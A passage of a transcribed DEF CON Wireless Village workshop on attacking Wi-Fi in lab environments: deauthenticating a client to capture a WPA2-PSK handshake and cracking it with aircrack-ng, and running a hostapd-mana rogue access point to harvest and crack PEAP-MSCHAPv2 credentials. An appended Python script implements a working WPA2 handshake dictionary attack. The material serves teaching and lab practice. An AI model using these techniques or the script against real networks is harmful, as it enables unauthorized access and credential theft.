capture the 4-way handshake and then we will attack it. So let's move to the lab. So let's go to Attacking WPA2-PSK. Again, you have to select a zone from here, prove to this guy that you are not a robot, you are a human, and then start the lab and wait. And the lab is ready. We will follow the same drill: first let's check the Wi-Fi interface. There is a Wi-Fi interface in managed mode and its name is wlan0. We will put it in monitor mode. Let's check if it is there; yes, it is in monitor mode. Now let's run airodump-ng on wlan0, and here we can observe that this is the SSID "protected network" which is using WPA2-PSK. So let's press Ctrl-C and move to the next step. SSID "protected network" is the one that we want to do the attack on, so for that what we want to do is we need to capture the 4-way handshake. So it is running on channel 4, so what we will do, we will run the airodump-ng packet capture on channel 4 using this command, and as you can observe it is now doing that. If you wait for some time it will also find the client that is attached to this specific machine. If you are not able to see it, don't worry, we will do a broadcast deauthentication on this SSID and then also it will work. But as you can observe here, airodump-ng has found one client, that is this client connected to this BSSID. Now if you remember, to capture the 4-way handshake we need to disconnect it, and for that we are going to use the deauthentication packet, and so we can launch it from the next step. Open a new tab; you can use the same wlan0 interface to do this, because you have set wlan0 on channel 4 and you want to send this packet on channel 4 as well. So click on this and you will see that aireplay-ng is sending the deauthentication packets, 100 packets, to this specific BSSID. Let's do Ctrl-C because I think these are enough, and let's go back here. And now what happened when we did this is this guy here, it was disconnected and then it reconnected once we stopped the deauthentication attack, and when it did that we captured the handshake for it.

So now we have the handshake. You can also run commands on it if you like to. So you can observe that we have the file, the capture file here; we also have this specific dictionary here which we will use to crack it. So now we can go ahead and try to crack it. We will use aircrack-ng with this dictionary, and test-01.cap is the capture file. So run it; the attack is running, and we have found the right key. So the right passphrase is raspberry. So with that this demo is done. This is how easy it is to attack it if you are using a weak passphrase.

So after WPA2-PSK, now we will talk about WPA2 Enterprise. We already learned about the shortcomings of WPA2 Personal. These are not really shortcomings, but it was designed in such a way, it was designed for personal purposes, so it was assumed that whoever is using the network, you don't need to hide your information from them. So that's the reason why the same password was there, and all the other people on the network had the capability to decrypt your traffic. But if you want to use this for your enterprise or for your company, this is going to be a problem, because the first thing is this insider, and the second thing is it is difficult to maintain the credentials, because everyone is using the same passphrase. Now suppose this passphrase gets leaked: you have to change it, you have to inform everybody, and you have to keep doing this again and again. So for that, these people came up with WPA2 Enterprise. So in WPA2 Enterprise, instead of using a passphrase, a RADIUS server is used for authentication. So this RADIUS server will maintain the credential list for all authorized users, and then users can use their usernames and passwords to authenticate with the Wi-Fi. So it looks like this: you have your Wi-Fi client, that is a laptop or a PC, and then you have the access point, which is connected to the RADIUS server. So this RADIUS server is the authentication back end here, and then this is the handshake flow. So the 4-way handshake will be there
because again it is WPA, but in this case, because there is no passphrase, EAP will be used. So EAP is Extended Authentication Protocol. So EAP will be used to do authentication with the authentication server, that is the RADIUS server in the back end. So your client, after doing the connection ritual, it will send an EAPOL-Start, which is the first packet, and then the access point will ask it for its identity. So if you are using credentials, the username will be the identity, and this username will then be forwarded to the authentication server. So after this, the access point will be in the path but it is not really doing anything. Your client and the authentication server will exchange some packets, and once it is proved to the authentication server that this guy or this client is the real client, it will generate a PMK. It is randomly generated, and then it will send this PMK to the access point and to the client. So you can observe the difference from the PSK here: it is not being generated from the passphrase that was known to both parties. And after you have the PMK on both the parties, you will do the same 4-way handshake, and then data transfer will continue.

Now the scheme that we are going to talk about in this demo is PEAP MSCHAPv2. So PEAP stands for Protected Extensible Authentication Protocol. It is known as protected, or it is being referred to as protected, because all the EAP packets that will be exchanged between your client and your authentication server will go through a TLS tunnel, so even the access point cannot look into it, right, what it is sending. And then MSCHAP: MS obviously stands for Microsoft, and then CHAP is Challenge Handshake Authentication Protocol. So it is a challenge-response authentication protocol where one party will send a challenge, and then the other party will send a response, and then they will verify each other. So it is like that. So the user account credentials, the password and the username, will be used; a TLS certificate will be used to create the tunnel and to make sure that the client is connecting to the correct authentication server.

So this is how it looks. So till here you can see that the client's identity is asked by the RADIUS server or the access point, and then the username is provided. After that it requests for the PEAP; the RADIUS server is initiating PEAP, and then a TLS tunnel will be set up. So this certificate will be sent by the authentication server to the client, and the client, if it accepts it, after that it will do the MSCHAP challenge. So the challenge will be sent, your client is supposed to provide a response and send it to the RADIUS server, the RADIUS server will check it, and if it is good then PEAP success will be conveyed and the PMK will be shared with the station, and at the same time it will also share the PMK with the access point, because PTK is the key that will be generated by the station and the access point, so RADIUS has nothing to do there.

But if you want to attack it, what are the ways? So what you can do is, instead of making the client connect to the real access point, you can create your own honeypot or fake access point, and when the client connects to it, obviously because you don't have access to the real RADIUS server (because if you had that, you could have taken credentials from there; you don't have that), you can create a fake RADIUS server which will say yes to all the credentials. And then here you are relying on the client that it will provide the real credentials. But before that there is a problem with PEAP: because there is a TLS tunnel, and because the certificate that your fake access point or fake RADIUS will send will not match the real certificate, your client will actually get a warning that the certificate doesn't match or we don't know this certificate. So at that point, if your client or if your user accepts this fake certificate, a non-real certificate, then you are in a problem; if you don't do this, then you are again safe. So you can say that this attack is a combination of
technical as well as social engineering angles. So we are going to do this attack, but to keep it simple, what we will do, instead of creating an evil twin, we will create a honeypot, so you don't have to do the deauth and all those things. So for that we are going to use the hostapd-mana toolkit. So it's a tool which can be used to create the rogue access point. It is generally used mainly for the enterprise networks, because it will keep the hassle of creating a RADIUS and all away from you. You can directly go, you can fire 3-4 commands and you are good to go, you are good to do the attack.

So let's go for the demo now. So here go for Attacking WPA2 Enterprise. Same drill: you have to select the server, you have to prove that you are a human, and you might have to solve this reCAPTCHA. So now the lab is ready. So let's see what interfaces are there on the lab. So here we can observe that there are two interfaces, wlan0 and wlan1. Let's put wlan0 into monitor mode and let's run airodump-ng on it. So what we can observe here is there is a client which is looking for amaze_LLC, right?

So if we go to the next step, we will see that the challenge is regarding this only: a client is probing for amaze_LLC, we have to create a honeypot and then we have to steal the credentials for it, and this guy is using PEAP MSCHAPv2. So let's do a Ctrl-C here. We will also need fake certificates, as we talked about before, and there you go, we have provided you all the things that you need for this. If you scroll down you will also see the configuration for hostapd-mana. So what you have to do here is first you have to create this file. So I am using vim; vim is available in most environments, so we can use that. And let's copy this and paste it here, and you have to format it, you have to make sure that everything is on separate lines. Let me do that. So now I have done the formatting for this file. Let's go over the configuration file. So first is the interface: we are using wlan1. SSID is mentioned: we want to host a honeypot with amaze_LLC. You can choose the channel as per your liking, I have chosen 6 here. Hardware mode is g, which indicates 11g, and then wpa=3 means WPA2, and here we are using TKIP; here you can put CCMP, you can put something else. So yeah, there is a mistake: when you put TKIP CCMP, that means you support both WPA and WPA2-PSK. And then for 802.1X, 802.1X is the EAP, and you are also hosting a fake back-end server. For that we will provide a special configuration in this file which can then be used by our hostapd-mana, and here you can observe the certificate, the key, all of that is provided, so that when the tunnel forms this setup can get the information and then show us what it is. mana_eapsuccess actually signifies that it doesn't matter what kind of credentials the user provides, we will always tell him that these are the correct ones. So this file is done. Let's create the second file; let's move a little and copy it from here, paste it. So to know more details about these configurations, I will suggest you visit hostapd-mana's GitHub page; the link to the documentation is also given here, so check that out, you will be able to understand this better. So this configuration will make sure that it doesn't matter what kind of scheme or what kind of method your EAP is using, it will support it, even if it is PEAP or TTLS or TLS, or even if it is using MSCHAP or GTC or something inside; all of that will be supported.

So once it is done we can move forward and we can launch this to start our honeypot. So what we can observe here is on interface wlan1 we have created the amaze_LLC SSID. Here what we are observing is a client which was roaming has tried to connect to this, you know, access point, and in that process we are able to see the information that it was passing. So if you remember, we talked about CHAP, right, the challenge-response; so here hostapd-mana is actually giving us the challenge, the response, so that we can crack it, and the username here is shawm. So this is the command with asleap to crack it. So if we move down, we have actually written this command for you. Let's clear the screen a little bit and let's run this command. So what we did here is, because we had the challenge and the response captured, we used a dictionary file that is given here, and from that we recovered the password for it. The password is chocolate in this case. So this is how, using a honeypot, you can attack enterprise networks, WPA2 Enterprise in this case, which was using PEAP MSCHAPv2; the attack will work similarly for the other schemes as well.

So with this we are going to conclude this workshop. I hope you learned about the basics of Wi-Fi and the schemes and how to attack them, and if you face these in the real world or in a CTF somewhere you will be able to solve it. So with that, thanks again for attending our workshop in the Wireless Village. We also thank the Wireless Village and the DefCon team for making all of this possible in these times; doesn't matter how bad it is, the learning should continue. And with that I will say thanks. If you have any follow-up questions, any comments, any feedback, here is my email id; you can drop me a mail and I will try to help you out. Thank you.
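Added example for the WPA2-PSK 4-way handshake and dictionary attack described earlier in this workshop. This is editor-added Python, not the speaker's lab material and not aircrack-ng code. It derives the PMK from the passphrase and SSID with PBKDF2-HMAC-SHA1, the PTK with the 802.11i PRF over the two MACs and two nonces, and the EAPOL-Key MIC (HMAC-SHA1 truncated to 128 bits, key descriptor version 2 as used with CCMP), then does exactly what the speaker describes: take one candidate from a wordlist, rebuild the PTK, recompute the MIC of the captured message 2 and compare. The SSID, BSSID, client MAC, nonces, RSN IE and wordlist are constructed for the example (the lab's real values are not on the page); only the passphrase "raspberry" comes from the demo. The "captured" frame is built by the same code, signed with the real passphrase, to stand in for what airodump-ng wrote to the .cap file.

```python
import hashlib
import hmac

# Offset of the 16-byte Key MIC inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + key nonce (32) + key IV (16) + key RSC (8) + key ID (8)
MIC_OFFSET = 81


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs) || max(MACs) || min(nonces) || max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key MIC for key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes.
    KCK is the first 16 bytes of the PTK. WPA/TKIP (version 1) uses HMAC-MD5 instead; not shown."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def mic_matches(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame) -> bool:
    """Recompute the MIC of a captured EAPOL-Key frame under a candidate passphrase."""
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic)


def dictionary_attack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame):
    """Try each candidate; the first one whose MIC verifies is the passphrase (None if no hit)."""
    for candidate in wordlist:
        if mic_matches(candidate, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame):
            return candidate
    return None


# ---- constructed sample handshake (stands in for an airodump-ng capture) ----
SSID = "ProtectedNetwork"                   # made-up SSID
AP_MAC = bytes.fromhex("02a1b2c3d4e5")      # made-up BSSID
STA_MAC = bytes.fromhex("02f1e2d3c4b5")     # made-up client MAC
ANONCE = bytes(range(0x10, 0x30))           # fixed "random" nonces so the example is reproducible
SNONCE = bytes(range(0x80, 0xA0))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE: CCMP, PSK AKM


def build_eapol_key_msg2(snonce: bytes, rsn_ie: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (supplicant -> AP) carrying the given MIC field."""
    body = (b"\x02"                                    # descriptor type: RSN (WPA2)
            + b"\x01\x0a"                              # key info: version 2, pairwise, MIC present
            + b"\x00\x10"                              # key length
            + (1).to_bytes(8, "big")                   # replay counter
            + snonce                                   # key nonce = SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key IV, key RSC, key ID
            + mic
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)  # key data: RSN IE
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 (Key)


def constructed_capture(passphrase: str = "raspberry") -> bytes:
    """Play the legitimate client: sign message 2 with the real passphrase from the demo."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_key_msg2(SNONCE, RSN_IE)
    return build_eapol_key_msg2(SNONCE, RSN_IE, eapol_mic(kck, unsigned))


def crack_constructed_capture():
    """Attacker side: only SSID, MACs, nonces and the signed frame are known."""
    wordlist = ["password", "letmein", "blueberry", "raspberry", "strawberry"]  # made-up dictionary
    return dictionary_attack(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, constructed_capture())


if __name__ == "__main__":
    print("recovered passphrase:", crack_constructed_capture())
```

Note that everything the attacker needs is visible in the clear: the MACs from any frame, ANonce from message 1 (or 3), SNonce and the MIC from message 2. The only secret is the passphrase, so the cost of the attack is one PBKDF2 run (4096 HMAC-SHA1 iterations) per candidate, which is why a passphrase present in a wordlist falls in seconds.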